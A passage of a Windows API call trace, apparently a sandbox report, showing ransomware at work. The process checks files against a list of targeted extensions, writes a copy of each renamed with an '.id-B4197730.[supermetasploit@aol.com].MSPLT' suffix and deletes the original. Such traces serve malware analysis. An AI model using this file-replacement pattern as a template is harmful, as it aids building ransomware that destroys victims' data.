shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0174.106] lstrlenW (lpString=".dbf") returned 4 [0174.106] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0174.106] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0174.106] lstrlenW (lpString=".1cd") returned 4 [0174.106] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0174.106] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 81 [0174.106] lstrlenW (lpString=".jpg") returned 4 [0174.106] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0174.106] lstrcmpiW (lpString1=".xml", lpString2=".MSPLT") returned 1 [0174.106] lstrlenW (lpString="osknumpad.xml") returned 13 [0174.106] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0174.111] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=219) returned 1 [0174.111] CloseHandle (hObject=0x374) returned 1 [0174.111] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml")) returned 0x20 [0174.111] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.112] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.112] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml") returned 78 [0174.112] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml") returned 78 [0174.112] lstrlenW (lpString=".doc") returned 4 [0174.112] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0174.112] lstrlenW (lpString=".docx") returned 5 [0174.113] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0174.113] lstrlenW (lpString=".pdf") returned 4 [0174.113] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0174.113] lstrlenW (lpString=".xls") returned 4 [0174.113] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0174.113] lstrlenW (lpString=".xlsx") returned 5 [0174.113] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0174.113] lstrlenW (lpString=".ppt") returned 4 [0174.113] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0174.113] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml") returned 78 [0174.113] lstrlenW (lpString=".zip") returned 4 [0174.113] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0174.113] lstrlenW (lpString=".rar") returned 4 [0174.113] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0174.113] lstrlenW (lpString=".bz2") returned 4 [0174.113] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0174.113] lstrlenW (lpString=".7z") returned 3 [0174.114] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0174.114] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml") returned 78 [0174.114] lstrlenW (lpString=".dbf") returned 4 [0174.114] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0174.187] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0174.298] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=2526) returned 1 [0174.299] CloseHandle (hObject=0x374) returned 1 [0174.299] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml")) returned 0x20 [0174.299] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.299] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.387] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.387] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.388] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0174.399] GetLastError () returned 0x0 [0174.399] ReadFile (in: hFile=0x374, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x374c, lpOverlapped=0x0) returned 1 [0174.407] WriteFile (in: hFile=0x36c, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x3750, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x3750, lpOverlapped=0x0) returned 1 [0174.409] ReadFile (in: hFile=0x374, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0174.409] WriteFile (in: hFile=0x36c, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xea, lpOverlapped=0x0) returned 1 [0174.409] SetEndOfFile (hFile=0x36c) returned 1 [0174.409] CloseHandle (hObject=0x36c) returned 1 [0174.411] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.411] SetEndOfFile (hFile=0x374) returned 1 [0174.412] CloseHandle (hObject=0x374) returned 1 [0174.412] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0174.413] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip")) returned 1 [0174.413] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip") returned 57 [0174.413] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip") returned 57 [0174.413] lstrlenW (lpString=".doc") returned 4 [0174.413] lstrcmpiW (lpString1=".doc", lpString2=".zip") returned -1 [0174.413] lstrlenW (lpString=".docx") returned 5 [0174.413] lstrcmpiW (lpString1=".docx", lpString2="t.zip") returned -1 [0174.413] lstrlenW (lpString=".pdf") returned 4 [0174.413] lstrcmpiW (lpString1=".pdf", lpString2=".zip") returned -1 [0174.413] lstrlenW (lpString=".xls") returned 4 [0174.413] lstrcmpiW (lpString1=".xls", lpString2=".zip") returned -1 [0174.414] lstrlenW (lpString=".xlsx") returned 5 [0174.415] lstrcmpiW (lpString1=".xlsx", lpString2="t.zip") returned -1 [0174.415] lstrlenW (lpString=".ppt") returned 4 [0174.415] lstrcmpiW (lpString1=".ppt", lpString2=".zip") returned -1 [0174.415] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip") returned 57 [0174.415] lstrlenW (lpString=".zip") returned 4 [0174.415] lstrcmpiW (lpString1=".zip", lpString2=".zip") returned 0 [0174.415] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip") returned 57 [0174.415] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip") returned 57 [0174.415] lstrlenW (lpString=".doc") returned 4 [0174.415] lstrcmpiW (lpString1=".doc", lpString2=".zip") returned -1 [0174.415] lstrlenW (lpString=".docx") returned 5 [0174.415] lstrcmpiW (lpString1=".docx", lpString2="t.zip") returned -1 [0174.415] lstrlenW (lpString=".pdf") returned 4 [0174.415] lstrcmpiW (lpString1=".pdf", lpString2=".zip") returned -1 [0174.415] lstrlenW (lpString=".xls") returned 4 [0174.415] lstrcmpiW (lpString1=".xls", lpString2=".zip") returned -1 [0174.415] lstrlenW (lpString=".xlsx") returned 5 [0174.415] lstrcmpiW (lpString1=".xlsx", lpString2="t.zip") returned -1 [0174.415] lstrlenW (lpString=".ppt") returned 4 [0174.415] lstrcmpiW (lpString1=".ppt", lpString2=".zip") returned -1 [0174.415] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\ffjcext.zip") returned 57 [0174.415] lstrlenW (lpString=".zip") returned 4 [0174.415] lstrcmpiW (lpString1=".zip", lpString2=".zip") returned 0 [0174.416] lstrcmpiW (lpString1=".gif", lpString2=".MSPLT") returned -1 [0174.416] lstrlenW (lpString="splash@2x.gif") returned 13 [0174.416] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0174.430] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=15276) returned 1 [0174.430] CloseHandle (hObject=0x374) returned 1 [0174.430] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif")) returned 0x20 [0174.431] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.431] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0174.431] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.431] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.431] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0174.431] GetLastError () returned 0x0 [0174.431] ReadFile (in: hFile=0x374, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x3bac, lpOverlapped=0x0) returned 1 [0174.440] WriteFile (in: hFile=0x36c, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x3bb0, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x3bb0, lpOverlapped=0x0) returned 1 [0174.442] ReadFile (in: hFile=0x374, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0174.442] WriteFile (in: hFile=0x36c, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xee, lpOverlapped=0x0) returned 1 [0174.442] SetEndOfFile (hFile=0x36c) returned 1 [0174.442] CloseHandle (hObject=0x36c) returned 1 [0174.448] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.448] SetEndOfFile (hFile=0x374) returned 1 [0174.450] CloseHandle (hObject=0x374) returned 1 [0174.450] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0174.450] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif")) returned 1 [0174.450] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0174.450] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0174.450] lstrlenW (lpString=".doc") returned 4 [0174.450] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0174.450] lstrlenW (lpString=".docx") returned 5 [0174.450] lstrcmpiW (lpString1=".docx", lpString2="x.gif") returned -1 [0174.450] lstrlenW (lpString=".pdf") returned 4 [0174.451] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0174.451] lstrlenW (lpString=".xls") returned 4 [0174.451] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0174.451] lstrlenW (lpString=".xlsx") returned 5 [0174.451] lstrcmpiW (lpString1=".xlsx", lpString2="x.gif") returned -1 [0174.451] lstrlenW (lpString=".ppt") returned 4 [0174.451] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0174.451] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0174.451] lstrlenW (lpString=".zip") returned 4 [0174.451] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0174.451] lstrlenW (lpString=".rar") returned 4 [0174.451] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0174.451] lstrlenW (lpString=".bz2") returned 4 [0174.451] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0174.451] lstrlenW (lpString=".7z") returned 3 [0174.451] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0174.451] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0174.451] lstrlenW (lpString=".dbf") returned 4 [0174.451] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0174.451] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0174.451] lstrlenW (lpString=".1cd") returned 4 [0174.451] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0174.451] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0174.451] lstrlenW (lpString=".jpg") returned 4 [0174.451] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0174.451] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0174.451] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0174.451] lstrlenW (lpString=".doc") returned 4 [0174.451] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0174.451] lstrlenW (lpString=".docx") returned 5 [0174.451] lstrcmpiW (lpString1=".docx", lpString2="x.gif") returned -1 [0174.452] lstrlenW (lpString=".pdf") returned 4 [0174.452] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0174.452] lstrlenW (lpString=".xls") returned 4 [0174.452] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0174.452] lstrlenW (lpString=".xlsx") returned 5 [0174.452] lstrcmpiW (lpString1=".xlsx", lpString2="x.gif") returned -1 [0174.452] lstrlenW (lpString=".ppt") returned 4 [0174.452] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0174.452] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0174.452] lstrlenW (lpString=".zip") returned 4 [0174.452] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0174.452] lstrlenW (lpString=".rar") returned 4 [0174.452] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0174.452] lstrlenW (lpString=".bz2") returned 4 [0174.452] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0174.452] lstrlenW (lpString=".7z") returned 3 [0174.452] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0174.452] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0174.452] lstrlenW (lpString=".dbf") returned 4 [0174.452] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0174.452] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0174.452] lstrlenW (lpString=".1cd") returned 4 [0174.452] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0174.452] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0174.452] lstrlenW (lpString=".jpg") returned 4 [0174.452] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0174.452] lstrcmpiW (lpString1=".gif", lpString2=".MSPLT") returned -1 [0174.452] lstrlenW (lpString="splash_11@2x-lic.gif") returned 20 [0174.453] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0174.453] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x2c2ff14 | out: lpFileSize=0x2c2ff14*=12250) returned 1 [0174.453] CloseHandle (hObject=0x374) returned 1 [0174.453] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif")) returned 0x20 [0174.453] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.453] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0174.453] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.453] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.453] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x36c [0174.454] GetLastError () returned 0x0 [0174.454] ReadFile (in: hFile=0x374, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x2fda, lpOverlapped=0x0) returned 1 [0174.482] WriteFile (in: hFile=0x36c, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0x2fe0, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0x2fe0, lpOverlapped=0x0) returned 1 [0174.483] ReadFile (in: hFile=0x374, lpBuffer=0x30d1020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c2fecc, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesRead=0x2c2fecc*=0x0, lpOverlapped=0x0) returned 1 [0174.483] WriteFile (in: hFile=0x36c, lpBuffer=0x30d1020*, nNumberOfBytesToWrite=0xfc, lpNumberOfBytesWritten=0x2c2fc94, lpOverlapped=0x0 | out: lpBuffer=0x30d1020*, lpNumberOfBytesWritten=0x2c2fc94*=0xfc, lpOverlapped=0x0) returned 1 [0174.483] SetEndOfFile (hFile=0x36c) returned 1 [0174.483] CloseHandle (hObject=0x36c) returned 1 [0174.492] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c2fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.492] SetEndOfFile (hFile=0x374) returned 1 [0174.493] CloseHandle (hObject=0x374) returned 1 [0174.493] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0174.494] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif")) returned 1 [0174.494] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0174.494] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0174.494] lstrlenW (lpString=".doc") returned 4 [0174.494] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0174.494] lstrlenW (lpString=".docx") returned 5 [0174.494] lstrcmpiW (lpString1=".docx", lpString2="c.gif") returned -1 [0174.494] lstrlenW (lpString=".pdf") returned 4 [0174.494] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0174.494] lstrlenW (lpString=".xls") returned 4 [0174.494] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0174.494] lstrlenW (lpString=".xlsx") returned 5 [0174.494] lstrcmpiW (lpString1=".xlsx", lpString2="c.gif") returned -1 [0174.494] lstrlenW (lpString=".ppt") returned 4 [0174.494] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0174.494] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0174.495] lstrlenW (lpString=".zip") returned 4 [0174.495] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0174.495] lstrlenW (lpString=".rar") returned 4 [0174.495] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0174.495] lstrlenW (lpString=".bz2") returned 4 [0174.495] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0174.495] lstrlenW (lpString=".7z") returned 3 [0174.495] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0174.495] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0174.495] lstrlenW (lpString=".dbf") returned 4 [0174.495] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0174.495] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0174.495] lstrlenW (lpString=".1cd") returned 4 [0174.495] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0174.495] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0174.495] lstrlenW (lpString=".jpg") returned 4 [0174.495] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0174.495] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0174.495] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0174.495] lstrlenW (lpString=".doc") returned 4 [0174.495] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0174.495] lstrlenW (lpString=".docx") returned 5 [0174.495] lstrcmpiW (lpString1=".docx", lpString2="c.gif") returned -1 [0174.495] lstrlenW (lpString=".pdf") returned 4 [0174.495] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0174.495] lstrlenW (lpString=".xls") returned 4 [0174.495] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0174.495] lstrlenW (lpString=".xlsx") returned 5 [0174.496] lstrcmpiW (lpString1=".xlsx", lpString2="c.gif") returned -1 [0174.496] lstrlenW (lpString=".ppt") returned 4 [0174.496] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0174.496] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif") returned 66 [0174.496] lstrlenW 